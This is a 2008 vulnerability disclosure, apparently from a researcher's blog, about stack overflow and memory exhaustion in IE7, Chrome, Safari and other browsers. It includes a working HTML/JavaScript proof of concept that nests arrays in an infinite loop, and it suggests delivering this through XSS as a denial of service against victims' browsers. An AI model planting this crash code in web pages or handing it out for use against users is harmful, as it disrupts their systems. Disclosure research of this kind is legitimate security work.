##################################################
Multiple Browsers Stack overflow in javascript with infinite array
original article:http://lostmon.blogspot.com/
2008/11/multiple-browsers-stack-overflow-in.html
##################################################
############
Description
############

Multiple Browsers are prone vulnerables to a stack overflow
or crash via infinite array in Javascript engine.
This is a extended research from this vulnerability/exploit :
http://www.securityfocus.com/bid/31703

This issue can use for example in a web post vulnerable to xss
Style attacks or similar to do a DoS from web to Web browsers victim´s.

################
Browsers Tested:
################

Fail = affected
pass = Not affected ¿?

#####################
Testing
#####################
.:[-Multiple Browsers infnite array PoC By Lostmon -]:.
Here You have two variants of this array sav this file:
#####################################
<html>
<head>
<title>.:[-Multiple Browsers infnite array PoC By Lostmon -]:.</title>
<script type="text/javascript">
function infinite_array()
{
foo = new Array();
alert('infinite array');
while(true) {foo = new Array(foo);}
}
function infinite_array2()
{
foo = new Array();
alert('Infinite array with sort()');
while(true) {foo = new Array(foo).sort();}
}
</script>
</head>
<body>
<h3>.:[-Multiple Browsers infnite array PoC By Lostmon -]:.</h3>
<input type="button" value="Infinite array Without sort()"
onclick="infinite_array();" />
<input type="button" value="Infinite array with sort()"
onclick="infinite_array2();" />
</body></html>
####################################

see table image :
http://usuarios.lycos.es/reyfuss/xss/images/tabla.GIF

###############
Stack Overflow
###############

IE7 , Avant Browser and Maxthor browsers this cause a stack
overflow in javascript.

In ie7 i try to trace and exploit it with olly debugger ,
but all cases what i test to turn it executable , are all
time go to SEH. This is not exploitable , and the browsers
wen click in the alert can continue working without problems;
them this is a recoverable issue.Microsoft security team has
determine that this issue at this moment is not exploitable.

In Google Chrome can cause a tab Crash or if we only have
open one window and one tab, open the exploit, and don´t wait,
try to navigate to google or other site causes that google
Chrome close without warning , error, or alert, if we have
open multiple tabs, this issue only crash/close the tab
affected by the exploit. If open the exploit and wait few
seconds Chrome show a warning to close the crashed tab.


################
Memory abuse
################

In ie7 can cause a memory abuse and can turn unestable all
system and all aplications.(it can load all memory)

In safari for windows can cause a program termination, safari
closes all windows, all tabs without a alert or a warning or
error.With olly , can trace , and it´s too a stack overflow.

In Google Chrome can cause a tab Crash or if we only have open
one window and one tab, open the exploit, and don´t wait, try
to navigate to google or other site causes that google Chrome
close without warning , error, or alert if open the exploit
and wait few seconds Chrome show a warning to close the
crashed tab.

Some other browsers detects the slow scripts and ask for stop.
In opera , it abuse memory , but we can recover it or navigate
to other sites them this is a recoverable issue.

#######################€nd#####################

Thnx to Microsoft security team for support & interesting.
Thnx to Apple security team for support & interesting.
--
Thnx to estrella to be my ligth
Thnx To FalconDeOro for his support
Thnx To Imydes From http://www.imydes.com

--
atentamente:
Lostmon (lostmon@gmail.com)

Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

-- 
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....